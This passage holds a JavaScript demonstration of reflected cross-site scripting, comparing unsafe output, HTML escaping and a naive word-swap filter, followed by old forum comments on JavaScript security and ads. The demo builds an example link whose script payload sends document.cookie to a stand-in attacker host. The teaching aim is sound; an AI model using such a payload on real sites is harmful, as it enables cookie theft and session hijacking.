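    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the raw query lands in the page, so <script> in the query
// becomes a live <script> element in the document.
function renderResultsUnsafe(query) {
  return '<h1>You searched for: ' + query + '</h1>';
}

// Fixed: the query is encoded at the point it is written into HTML.
function renderResultsSafe(query) {
  return '<h1>You searched for: ' + escapeHtml(query) + '</h1>';
}

// Constructed Yahoo-style filter: swap words that "can be interpreted as
// JavaScript commands". Only the two pairs quoted in the thread are
// modelled; this is an assumption about the real filter, not its list.
function wordSwapFilter(s) {
  return s.replace(/eval/gi, 'review').replace(/expression/gi, 'statement');
}

// Does the output still contain a script element? Case-insensitive,
// because browsers are.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Mimic the GET link from the post: the payload arrives URL-encoded.
function queryFromLink(url) {
  const q = url.split('?')[1] || '';
  return decodeURIComponent(q.replace(/\+/g, ' '));
}

// Constructed attacker link: reads document.cookie and sends it to the
// attacker's server in the query string, as the post describes.
const attackerLink =
  'http://yoursite.com/search?' +
  encodeURIComponent(
    "<script>location='http://attacker.example/?c='+document.cookie</script>"
  );

const query = queryFromLink(attackerLink);
console.log('unsafe :', renderResultsUnsafe(query)); // script survives
console.log('safe   :', renderResultsSafe(query));   // script is inert text

// The word swap breaks legitimate prose from the thread...
console.log('swap   :', wordSwapFilter('Medieval art was limited in its expression'));
// ...and still lets a payload that avoids the listed words through.
console.log('swap passes payload:', containsScriptTag(wordSwapFilter(renderResultsUnsafe(query))));
```

The point of running both filters on the same input is that the word swap changes the meaning of harmless text while leaving a `<script>` payload intact, whereas encoding at the output point neutralises the payload without caring what words it contains.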
Who the --- uses Lycos anyway? Yahoo. Google. DejaNews.
Javascript is useful, no doubt there. Takes all sorts of loads off servers. The main annoying part of it (which is the real issue here, and the reason exit traps are such an annoyance) is that you can't just disable javascript's ability to open new windows whilst leaving the rest of its abilities intact. grrrr.
That's it. End of story. If browsers let you do that, we'd all be happy.
As well as Konqueror. Mozilla, on the other hand, brings the window up slow enough that you can go to another page while you wait.
Then what does the "L" stand for?
-1, Troll (self-moderated)
Guess that's what we should expect from someone at San Diego State. Pfft, c'mon, you're being ridiculous. The internet allows people access to others' machines; should we shut it down? No... just fix things. Java is cool, and anything that is cool can be turned bad, that's life... let's fix it, not kill it. Like tigers: tigers are cool, but I don't kill them even though they may like to eat me. San Diego State, really....
This link is a fine example... difficult to get out of on Microsoft browsers.
HTML is only a "Mark-up Language"; it changes the format of the text displayed on the page, and it's quite easy to make sure the formatting doesn't do anything besides formatting.
JavaScript does a lot more, i.e., open new windows, change content based on where the mouse is, etc. The security hole is just that a site can make the resulting search result page contain JavaScript code that will be run. This requires you to have JavaScript enabled in your browser; if not, there is no issue. Without this 'security hole', you would also be 'exposed' to the JavaScript if you clicked on the link to that site.
Looking for any old 8-bit Heathkit/Zenith software/hardware - http://heathkit.garlanger.com
Ouch! Don't do that! The link showed up as 'visited' in my browser! And I'm sure I flushed my cache last week...
I get the same problem with that Oracle ad. It seems to happen with doubleclick ads.
Can't be sure tho'
PS. why is /. using evil doubleclick?
Sorry if I don't get it, but is this really a security issue?
Looks more like an "undocumented feature" of the engine. Granted, perhaps only spammers and pr0nners might want to use it.
I try to keep up with the security alerts; I'd say somewhere around 5 to 10% of them elicit a response of "Uh, so what?" from me.
Maybe I'm just too ignorant to get it.
Who the hell's making 80K/yr?
/.ers.
I'll bet not very many
IT/IS managers maybe.
::Proof once again that the jerks have more spare time then the people who actually do something worthwhile.::
I'd say that 9 times out of 10 this sentiment is expressed, the jerks actually ARE doing something worthwhile, by forcing complacent developers to get themselves into gear and improve the way things work.
I'm not so into languages, but why is it so hard to make this language secure? HTML is secure, so why not this too?
maddjn
--EOF--